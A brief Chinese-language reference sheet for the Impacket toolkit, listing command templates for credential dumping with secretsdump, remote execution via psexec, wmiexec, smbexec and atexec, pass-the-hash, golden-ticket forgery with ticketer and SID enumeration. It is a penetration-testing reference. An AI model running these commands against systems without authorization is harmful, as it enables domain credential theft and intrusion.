Impacket

Impacket 是一组 Python 工具集，用于网络协议操作和远程执行，广泛用于渗透测试。

基础使用

secretsdump - 凭证转储

secretsdump.py domain/user:[email protected]

psexec - 远程执行

psexec.py domain/user:[email protected]

wmiexec - WMI 远程执行

wmiexec.py domain/user:[email protected]

smbexec - SMB 远程执行

smbexec.py domain/user:[email protected]

atexec - 计划任务执行

atexec.py domain/user:[email protected]

常用工具

工具	描述
secretsdump.py	凭证转储
psexec.py	PSExec 远程执行
wmiexec.py	WMI 远程执行
smbexec.py	SMB 远程执行
atexec.py	计划任务执行
ticketer.py	Kerberos 票据伪造
goldenPac.py	黄金票据攻击
getTGT.py	获取 TGT 票据
getST.py	获取 ST 票据
lookupsid.py	SID 枚举

功能特性

远程执行 - 多种远程执行方式
凭证转储 - 提取域凭证
Kerberos 攻击 - 票据攻击支持
协议支持 - SMB、MSRPC、WMI 等

使用示例

# 使用哈希传递
psexec.py -hashes :HASH domain/[email protected]

# 转储域控制器
secretsdump.py domain/[email protected]

# 创建黄金票据
ticketer.py -nthash HASH -domain-sid SID domain.com

# 枚举用户
lookupsid.py domain/user:[email protected]

参考资源

Impacket GitHub